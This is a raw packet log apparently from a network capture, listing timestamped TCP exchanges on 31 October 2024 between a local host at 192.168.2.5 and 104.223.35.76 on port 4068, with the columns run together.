                              Oct 31, 2024 10:32:09.536068916 CET499774068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:32:09.541054010 CET406849977104.223.35.76192.168.2.5
                              Oct 31, 2024 10:32:10.125515938 CET406849977104.223.35.76192.168.2.5
                              Oct 31, 2024 10:32:10.125618935 CET499774068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:32:13.050539970 CET499774068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:32:13.052598000 CET499954068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:32:13.055396080 CET406849977104.223.35.76192.168.2.5
                              Oct 31, 2024 10:32:13.057424068 CET406849995104.223.35.76192.168.2.5
                              Oct 31, 2024 10:32:13.057528973 CET499954068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:32:13.087949038 CET499954068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:32:13.093146086 CET406849995104.223.35.76192.168.2.5
                              Oct 31, 2024 10:32:13.639307976 CET406849995104.223.35.76192.168.2.5
                              Oct 31, 2024 10:32:13.639487028 CET499954068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:32:13.706521034 CET499954068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:32:13.710195065 CET499984068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:32:13.711414099 CET406849995104.223.35.76192.168.2.5
                              Oct 31, 2024 10:32:13.715068102 CET406849998104.223.35.76192.168.2.5
                              Oct 31, 2024 10:32:13.715150118 CET499984068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:32:13.740076065 CET499984068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:32:13.744914055 CET406849998104.223.35.76192.168.2.5
                              Oct 31, 2024 10:32:14.308464050 CET406849998104.223.35.76192.168.2.5
                              Oct 31, 2024 10:32:14.308532953 CET499984068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:32:16.128467083 CET499984068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:32:16.130481005 CET499994068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:32:16.133887053 CET406849998104.223.35.76192.168.2.5
                              Oct 31, 2024 10:32:16.135371923 CET406849999104.223.35.76192.168.2.5
                              Oct 31, 2024 10:32:16.135449886 CET499994068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:32:16.146354914 CET499994068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:32:16.152038097 CET406849999104.223.35.76192.168.2.5
                              Oct 31, 2024 10:32:16.736289978 CET406849999104.223.35.76192.168.2.5
                              Oct 31, 2024 10:32:16.737766027 CET499994068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:32:18.519062996 CET499994068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:32:18.520276070 CET500004068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:32:18.524059057 CET406849999104.223.35.76192.168.2.5
                              Oct 31, 2024 10:32:18.525181055 CET406850000104.223.35.76192.168.2.5
                              Oct 31, 2024 10:32:18.525275946 CET500004068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:32:18.535919905 CET500004068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:32:18.541012049 CET406850000104.223.35.76192.168.2.5
                              Oct 31, 2024 10:32:19.137346983 CET406850000104.223.35.76192.168.2.5
                              Oct 31, 2024 10:32:19.137522936 CET500004068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:32:20.315901995 CET500004068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:32:20.318155050 CET500014068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:32:20.320804119 CET406850000104.223.35.76192.168.2.5
                              Oct 31, 2024 10:32:20.323124886 CET406850001104.223.35.76192.168.2.5
                              Oct 31, 2024 10:32:20.323200941 CET500014068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:32:20.418299913 CET500014068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:32:20.423144102 CET406850001104.223.35.76192.168.2.5
                              Oct 31, 2024 10:32:20.924993038 CET406850001104.223.35.76192.168.2.5
                              Oct 31, 2024 10:32:20.925316095 CET500014068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:32:22.097300053 CET500014068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:32:22.098588943 CET500024068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:32:22.102139950 CET406850001104.223.35.76192.168.2.5
                              Oct 31, 2024 10:32:22.103471994 CET406850002104.223.35.76192.168.2.5
                              Oct 31, 2024 10:32:22.103553057 CET500024068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:32:22.113014936 CET500024068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:32:22.118046999 CET406850002104.223.35.76192.168.2.5
                              Oct 31, 2024 10:32:22.726711035 CET406850002104.223.35.76192.168.2.5
                              Oct 31, 2024 10:32:22.726849079 CET500024068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:32:23.894179106 CET500024068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:32:23.895448923 CET500034068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:32:23.899177074 CET406850002104.223.35.76192.168.2.5
                              Oct 31, 2024 10:32:23.901204109 CET406850003104.223.35.76192.168.2.5
                              Oct 31, 2024 10:32:23.901303053 CET500034068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:32:23.911215067 CET500034068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:32:23.917193890 CET406850003104.223.35.76192.168.2.5
                              Oct 31, 2024 10:32:24.500196934 CET406850003104.223.35.76192.168.2.5
                              Oct 31, 2024 10:32:24.500297070 CET500034068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:32:25.566111088 CET500034068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:32:25.567339897 CET500044068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:32:25.572357893 CET406850003104.223.35.76192.168.2.5
                              Oct 31, 2024 10:32:25.573443890 CET406850004104.223.35.76192.168.2.5
                              Oct 31, 2024 10:32:25.573545933 CET500044068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:32:25.583420992 CET500044068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:32:25.589354038 CET406850004104.223.35.76192.168.2.5
                              Oct 31, 2024 10:32:26.183011055 CET406850004104.223.35.76192.168.2.5
                              Oct 31, 2024 10:32:26.183150053 CET500044068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:32:26.737984896 CET500044068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:32:26.739319086 CET500054068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:32:26.742888927 CET406850004104.223.35.76192.168.2.5
                              Oct 31, 2024 10:32:26.744338036 CET406850005104.223.35.76192.168.2.5
                              Oct 31, 2024 10:32:26.747828007 CET500054068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:32:26.758675098 CET500054068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:32:26.763820887 CET406850005104.223.35.76192.168.2.5
                              Oct 31, 2024 10:32:27.345829010 CET406850005104.223.35.76192.168.2.5
                              Oct 31, 2024 10:32:27.345980883 CET500054068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:32:27.628493071 CET500054068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:32:27.629754066 CET500064068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:32:27.633397102 CET406850005104.223.35.76192.168.2.5
                              Oct 31, 2024 10:32:27.634656906 CET406850006104.223.35.76192.168.2.5
                              Oct 31, 2024 10:32:27.634798050 CET500064068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:32:27.644771099 CET500064068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:32:27.649696112 CET406850006104.223.35.76192.168.2.5
                              Oct 31, 2024 10:32:28.220573902 CET406850006104.223.35.76192.168.2.5
                              Oct 31, 2024 10:32:28.221801043 CET500064068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:32:28.378752947 CET500064068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:32:28.381617069 CET500074068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:32:28.383718967 CET406850006104.223.35.76192.168.2.5
                              Oct 31, 2024 10:32:28.386511087 CET406850007104.223.35.76192.168.2.5
                              Oct 31, 2024 10:32:28.386586905 CET500074068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:32:28.406347990 CET500074068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:32:28.411454916 CET406850007104.223.35.76192.168.2.5
                              Oct 31, 2024 10:32:28.966406107 CET406850007104.223.35.76192.168.2.5
                              Oct 31, 2024 10:32:28.966489077 CET500074068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:32:29.284688950 CET500074068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:32:29.286128998 CET500084068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:32:29.289649963 CET406850007104.223.35.76192.168.2.5
                              Oct 31, 2024 10:32:29.291074038 CET406850008104.223.35.76192.168.2.5
                              Oct 31, 2024 10:32:29.291167974 CET500084068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:32:29.301418066 CET500084068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:32:29.306282043 CET406850008104.223.35.76192.168.2.5
                              Oct 31, 2024 10:32:29.918082952 CET406850008104.223.35.76192.168.2.5
                              Oct 31, 2024 10:32:29.921823025 CET500084068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:32:30.034774065 CET500084068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:32:30.039864063 CET406850008104.223.35.76192.168.2.5
                              Oct 31, 2024 10:32:35.779566050 CET500094068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:32:35.784554958 CET406850009104.223.35.76192.168.2.5
                              Oct 31, 2024 10:32:35.784634113 CET500094068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:32:35.815716028 CET500094068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:32:35.822771072 CET406850009104.223.35.76192.168.2.5
                              Oct 31, 2024 10:32:35.864797115 CET500094068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:32:35.869658947 CET406850009104.223.35.76192.168.2.5
                              Oct 31, 2024 10:32:36.380069017 CET406850009104.223.35.76192.168.2.5
                              Oct 31, 2024 10:32:36.385751963 CET500094068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:32:36.661456108 CET500094068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:32:36.661931992 CET500104068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:32:36.666465044 CET406850009104.223.35.76192.168.2.5
                              Oct 31, 2024 10:32:36.666786909 CET406850010104.223.35.76192.168.2.5
                              Oct 31, 2024 10:32:36.666877985 CET500104068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:32:36.718416929 CET500104068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:32:36.723325968 CET406850010104.223.35.76192.168.2.5
                              Oct 31, 2024 10:32:37.262608051 CET406850010104.223.35.76192.168.2.5
                              Oct 31, 2024 10:32:37.262703896 CET500104068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:32:37.487785101 CET500104068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:32:37.491667032 CET500114068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:32:37.494679928 CET406850010104.223.35.76192.168.2.5
                              Oct 31, 2024 10:32:37.496664047 CET406850011104.223.35.76192.168.2.5
                              Oct 31, 2024 10:32:37.496737003 CET500114068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:32:37.517736912 CET500114068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:32:37.522546053 CET406850011104.223.35.76192.168.2.5
                              Oct 31, 2024 10:32:38.134949923 CET406850011104.223.35.76192.168.2.5
                              Oct 31, 2024 10:32:38.137819052 CET500114068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:32:38.253499031 CET500114068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:32:38.255532026 CET500124068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:32:38.258982897 CET406850011104.223.35.76192.168.2.5
                              Oct 31, 2024 10:32:38.260999918 CET406850012104.223.35.76192.168.2.5
                              Oct 31, 2024 10:32:38.261104107 CET500124068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:32:38.272244930 CET500124068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:32:38.277761936 CET406850012104.223.35.76192.168.2.5
                              Oct 31, 2024 10:32:38.856389999 CET406850012104.223.35.76192.168.2.5
                              Oct 31, 2024 10:32:38.857759953 CET500124068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:32:38.909739017 CET500124068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:32:38.913733959 CET500134068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:32:38.914719105 CET406850012104.223.35.76192.168.2.5
                              Oct 31, 2024 10:32:38.919667006 CET406850013104.223.35.76192.168.2.5
                              Oct 31, 2024 10:32:38.919755936 CET500134068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:32:38.933737040 CET500134068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:32:38.938745022 CET406850013104.223.35.76192.168.2.5
                              Oct 31, 2024 10:32:39.532895088 CET406850013104.223.35.76192.168.2.5
                              Oct 31, 2024 10:32:39.532982111 CET500134068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:32:39.547210932 CET500134068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:32:39.551331043 CET500144068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:32:39.553421974 CET406850013104.223.35.76192.168.2.5
                              Oct 31, 2024 10:32:39.560600042 CET406850014104.223.35.76192.168.2.5
                              Oct 31, 2024 10:32:39.560669899 CET500144068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:32:39.580538988 CET500144068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:32:39.585464001 CET406850014104.223.35.76192.168.2.5
                              Oct 31, 2024 10:32:39.990746975 CET500144068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:32:39.995793104 CET406850014104.223.35.76192.168.2.5
                              Oct 31, 2024 10:32:40.153628111 CET406850014104.223.35.76192.168.2.5
                              Oct 31, 2024 10:32:40.153815985 CET500144068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:32:40.153888941 CET500144068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:32:40.155577898 CET500154068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:32:40.158824921 CET406850014104.223.35.76192.168.2.5
                              Oct 31, 2024 10:32:40.160499096 CET406850015104.223.35.76192.168.2.5
                              Oct 31, 2024 10:32:40.160584927 CET500154068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:32:40.185684919 CET500154068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:32:40.190582037 CET406850015104.223.35.76192.168.2.5
                              Oct 31, 2024 10:32:40.284888983 CET500154068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:32:40.289733887 CET406850015104.223.35.76192.168.2.5
                              Oct 31, 2024 10:32:40.691168070 CET500154068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:32:40.696014881 CET406850015104.223.35.76192.168.2.5
                              Oct 31, 2024 10:32:40.752414942 CET406850015104.223.35.76192.168.2.5
                              Oct 31, 2024 10:32:40.752593994 CET500154068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:32:40.752593994 CET500154068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:32:40.754456043 CET500164068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:32:40.757498980 CET406850015104.223.35.76192.168.2.5
                              Oct 31, 2024 10:32:40.759325027 CET406850016104.223.35.76192.168.2.5
                              Oct 31, 2024 10:32:40.759449959 CET500164068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:32:40.829734087 CET500164068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:32:40.834737062 CET406850016104.223.35.76192.168.2.5
                              Oct 31, 2024 10:32:41.356281996 CET406850016104.223.35.76192.168.2.5
                              Oct 31, 2024 10:32:41.356353998 CET500164068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:32:46.144309044 CET500164068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:32:46.149456024 CET406850016104.223.35.76192.168.2.5
                              Oct 31, 2024 10:32:46.156498909 CET500174068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:32:46.161673069 CET406850017104.223.35.76192.168.2.5
                              Oct 31, 2024 10:32:46.161740065 CET500174068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:32:46.233880043 CET500174068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:32:46.238770962 CET406850017104.223.35.76192.168.2.5
                              Oct 31, 2024 10:32:46.762527943 CET406850017104.223.35.76192.168.2.5
                              Oct 31, 2024 10:32:46.764215946 CET500174068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:32:51.242059946 CET500174068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:32:51.245143890 CET500184068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:32:51.247302055 CET406850017104.223.35.76192.168.2.5
                              Oct 31, 2024 10:32:51.250044107 CET406850018104.223.35.76192.168.2.5
                              Oct 31, 2024 10:32:51.250124931 CET500184068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:32:51.300350904 CET500184068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:32:51.305217028 CET406850018104.223.35.76192.168.2.5
                              Oct 31, 2024 10:32:51.425770998 CET500184068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:32:51.430759907 CET406850018104.223.35.76192.168.2.5
                              Oct 31, 2024 10:32:51.839653015 CET406850018104.223.35.76192.168.2.5
                              Oct 31, 2024 10:32:51.839739084 CET500184068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:32:56.534775019 CET500184068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:32:56.536699057 CET500194068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:32:56.539810896 CET406850018104.223.35.76192.168.2.5
                              Oct 31, 2024 10:32:56.541951895 CET406850019104.223.35.76192.168.2.5
                              Oct 31, 2024 10:32:56.542095900 CET500194068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:32:56.763055086 CET500194068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:32:56.768117905 CET406850019104.223.35.76192.168.2.5
                              Oct 31, 2024 10:32:57.135108948 CET406850019104.223.35.76192.168.2.5
                              Oct 31, 2024 10:32:57.135206938 CET500194068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:32:57.136183977 CET500194068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:32:57.137974024 CET500204068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:32:57.140995979 CET406850019104.223.35.76192.168.2.5
                              Oct 31, 2024 10:32:57.142932892 CET406850020104.223.35.76192.168.2.5
                              Oct 31, 2024 10:32:57.143076897 CET500204068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:32:57.158147097 CET500204068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:32:57.163028955 CET406850020104.223.35.76192.168.2.5
                              Oct 31, 2024 10:32:57.916027069 CET406850020104.223.35.76192.168.2.5
                              Oct 31, 2024 10:32:57.917218924 CET500204068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:32:57.936013937 CET500204068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:32:57.937939882 CET500214068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:32:57.941771984 CET406850020104.223.35.76192.168.2.5
                              Oct 31, 2024 10:32:57.943284035 CET406850021104.223.35.76192.168.2.5
                              Oct 31, 2024 10:32:57.943361044 CET500214068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:32:57.964349031 CET500214068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:32:57.970010042 CET406850021104.223.35.76192.168.2.5
                              Oct 31, 2024 10:32:58.542395115 CET406850021104.223.35.76192.168.2.5
                              Oct 31, 2024 10:32:58.544054031 CET500214068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:33:03.510998964 CET500214068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:33:03.515986919 CET406850021104.223.35.76192.168.2.5
                              Oct 31, 2024 10:33:03.516421080 CET500224068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:33:03.521332026 CET406850022104.223.35.76192.168.2.5
                              Oct 31, 2024 10:33:03.521408081 CET500224068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:33:03.634799957 CET500224068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:33:03.639869928 CET406850022104.223.35.76192.168.2.5
                              Oct 31, 2024 10:33:04.121787071 CET406850022104.223.35.76192.168.2.5
                              Oct 31, 2024 10:33:04.121896982 CET500224068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:33:08.738090038 CET500224068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:33:08.740195036 CET500234068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:33:08.743017912 CET406850022104.223.35.76192.168.2.5
                              Oct 31, 2024 10:33:08.745099068 CET406850023104.223.35.76192.168.2.5
                              Oct 31, 2024 10:33:08.745201111 CET500234068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:33:08.786309958 CET500234068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:33:08.791265965 CET406850023104.223.35.76192.168.2.5
                              Oct 31, 2024 10:33:09.331687927 CET500234068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:33:09.416040897 CET406850023104.223.35.76192.168.2.5
                              Oct 31, 2024 10:33:09.416208029 CET500234068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:33:09.416282892 CET500234068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:33:09.417465925 CET406850023104.223.35.76192.168.2.5
                              Oct 31, 2024 10:33:09.419363022 CET500244068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:33:09.421015978 CET406850023104.223.35.76192.168.2.5
                              Oct 31, 2024 10:33:09.421051025 CET406850023104.223.35.76192.168.2.5
                              Oct 31, 2024 10:33:09.424417019 CET406850024104.223.35.76192.168.2.5
                              Oct 31, 2024 10:33:09.424525976 CET500244068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:33:09.527343035 CET500244068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:33:09.535063982 CET406850024104.223.35.76192.168.2.5
                              Oct 31, 2024 10:33:10.034059048 CET406850024104.223.35.76192.168.2.5
                              Oct 31, 2024 10:33:10.037853956 CET500244068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:33:14.753369093 CET500244068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:33:14.757482052 CET500254068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:33:14.758357048 CET406850024104.223.35.76192.168.2.5
                              Oct 31, 2024 10:33:14.762530088 CET406850025104.223.35.76192.168.2.5
                              Oct 31, 2024 10:33:14.762741089 CET500254068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:33:14.805119038 CET500254068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:33:14.810373068 CET406850025104.223.35.76192.168.2.5
                              Oct 31, 2024 10:33:14.810539007 CET500254068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:33:14.815695047 CET406850025104.223.35.76192.168.2.5
                              Oct 31, 2024 10:33:14.894510031 CET500254068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:33:14.899530888 CET406850025104.223.35.76192.168.2.5
                              Oct 31, 2024 10:33:15.113147974 CET500254068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:33:15.118215084 CET406850025104.223.35.76192.168.2.5
                              Oct 31, 2024 10:33:15.364526033 CET406850025104.223.35.76192.168.2.5
                              Oct 31, 2024 10:33:15.367995977 CET500254068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:33:20.050775051 CET500254068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:33:20.052181005 CET500264068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:33:20.055778027 CET406850025104.223.35.76192.168.2.5
                              Oct 31, 2024 10:33:20.057069063 CET406850026104.223.35.76192.168.2.5
                              Oct 31, 2024 10:33:20.057156086 CET500264068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:33:20.090399027 CET500264068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:33:20.095429897 CET406850026104.223.35.76192.168.2.5
                              Oct 31, 2024 10:33:20.180491924 CET500264068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:33:20.185421944 CET406850026104.223.35.76192.168.2.5
                              Oct 31, 2024 10:33:20.648204088 CET406850026104.223.35.76192.168.2.5
                              Oct 31, 2024 10:33:20.652534962 CET500264068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:33:25.253412008 CET500264068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:33:25.255458117 CET500274068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:33:25.258451939 CET406850026104.223.35.76192.168.2.5
                              Oct 31, 2024 10:33:25.260426044 CET406850027104.223.35.76192.168.2.5
                              Oct 31, 2024 10:33:25.260503054 CET500274068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:33:25.349006891 CET500274068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:33:25.354113102 CET406850027104.223.35.76192.168.2.5
                              Oct 31, 2024 10:33:25.858266115 CET406850027104.223.35.76192.168.2.5
                              Oct 31, 2024 10:33:25.858406067 CET500274068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:33:30.722296000 CET500274068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:33:30.725279093 CET500284068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:33:30.727323055 CET406850027104.223.35.76192.168.2.5
                              Oct 31, 2024 10:33:30.730834961 CET406850028104.223.35.76192.168.2.5
                              Oct 31, 2024 10:33:30.730916977 CET500284068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:33:30.796504974 CET500284068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:33:30.801403046 CET406850028104.223.35.76192.168.2.5
                              Oct 31, 2024 10:33:30.912030935 CET500284068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:33:30.916886091 CET406850028104.223.35.76192.168.2.5
                              Oct 31, 2024 10:33:31.319730043 CET406850028104.223.35.76192.168.2.5
                              Oct 31, 2024 10:33:31.319802046 CET500284068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:33:36.097290993 CET500284068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:33:36.103193045 CET406850028104.223.35.76192.168.2.5
                              Oct 31, 2024 10:33:41.060172081 CET500294068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:33:41.065062046 CET406850029104.223.35.76192.168.2.5
                              Oct 31, 2024 10:33:41.065155029 CET500294068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:33:41.104331970 CET500294068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:33:41.109421015 CET406850029104.223.35.76192.168.2.5
                              Oct 31, 2024 10:33:41.239520073 CET500294068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:33:41.244497061 CET406850029104.223.35.76192.168.2.5
                              Oct 31, 2024 10:33:41.512775898 CET500294068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:33:41.518393040 CET406850029104.223.35.76192.168.2.5
                              Oct 31, 2024 10:33:41.670473099 CET406850029104.223.35.76192.168.2.5
                              Oct 31, 2024 10:33:41.670754910 CET500294068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:33:46.159651995 CET500294068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:33:46.161261082 CET500304068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:33:46.164745092 CET406850029104.223.35.76192.168.2.5
                              Oct 31, 2024 10:33:46.166244984 CET406850030104.223.35.76192.168.2.5
                              Oct 31, 2024 10:33:46.166337967 CET500304068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:33:46.215532064 CET500304068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:33:46.220545053 CET406850030104.223.35.76192.168.2.5
                              Oct 31, 2024 10:33:46.624814987 CET500304068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:33:46.629643917 CET406850030104.223.35.76192.168.2.5
                              Oct 31, 2024 10:33:46.745539904 CET406850030104.223.35.76192.168.2.5
                              Oct 31, 2024 10:33:46.745604992 CET500304068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:33:51.657653093 CET500304068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:33:51.660214901 CET500314068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:33:51.662616014 CET406850030104.223.35.76192.168.2.5
                              Oct 31, 2024 10:33:51.665180922 CET406850031104.223.35.76192.168.2.5
                              Oct 31, 2024 10:33:51.665337086 CET500314068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:33:51.722801924 CET500314068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:33:51.727822065 CET406850031104.223.35.76192.168.2.5
                              Oct 31, 2024 10:33:52.020148993 CET500314068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:33:52.025448084 CET406850031104.223.35.76192.168.2.5
                              Oct 31, 2024 10:33:52.113215923 CET500314068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:33:52.118211985 CET406850031104.223.35.76192.168.2.5
                              Oct 31, 2024 10:33:52.253755093 CET406850031104.223.35.76192.168.2.5
                              Oct 31, 2024 10:33:52.257868052 CET500314068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:33:52.257953882 CET500314068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:33:52.259294033 CET500324068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:33:52.263463020 CET406850031104.223.35.76192.168.2.5
                              Oct 31, 2024 10:33:52.264230013 CET406850032104.223.35.76192.168.2.5
                              Oct 31, 2024 10:33:52.264328003 CET500324068192.168.2.5104.223.35.76
